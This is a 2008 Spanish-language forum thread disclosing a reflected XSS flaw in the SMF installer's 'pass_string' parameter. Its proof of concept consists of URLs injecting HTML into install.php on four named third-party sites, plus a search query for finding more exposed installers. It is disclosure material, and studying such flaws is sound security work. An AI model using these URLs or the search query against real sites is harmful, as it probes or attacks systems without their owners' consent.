XSS en el instalador de SMF

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Foro

Web

Blog

23 Noviembre 2024, 20:22 pm

Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

XSS en el instalador de SMF

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: XSS en el instalador de SMF (Leído 2,935 veces)

WHK

Moderador Global

Desconectado

Mensajes: 6.605

Sin conocimiento no hay espíritu

XSS en el instalador de SMF

« en: 19 Mayo 2008, 00:24 am »

Curosiando unos minutos encontré algunos instaladores de smf y me di cuenta que la variable pass_string tiene XSS en método GET.

POC:

Código:

http://casa.zimzum.es/smf/install.php?obgz=1&pass_string=<h1>WHK
http://www.evolutiv.eu/SMF/install.php?&obgz=1&pass_string=<h1>WHK
http://world-eyes.fr/smf/install.php?obgz=1&pass_string=<h1>WHK
http://www.pelusonas.com/foro/install.php?obgz=1&pass_string=<h1>WHK

Fuente:
http://www.google.cl/search?hl=es&q=allinurl%3Asmf+%2B+install.php

Salu2.


« Última modificación: 19 Mayo 2008, 00:31 am por WHK »	En línea

- https://yhojann.cl/ - https://whk.cl/

dimitrix

Desconectado

Mensajes: 4.847

Re: XSS en el instalador de SMF

« Respuesta #1 en: 19 Mayo 2008, 09:21 am »

Muy bueno, pero creo que si algún administrador no borra los archivos de instalación, ese XSS será su menor problemas XD

Muchas gracias de nuevo.


	En línea

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Instalador .net Software	pelaows	0	1,242	20 Marzo 2012, 17:00 pm por pelaows
	Instalador de S.O - USB « 1 2 » Windows	vipamon	15	8,544	26 Febrero 2013, 00:51 am por Luna71c0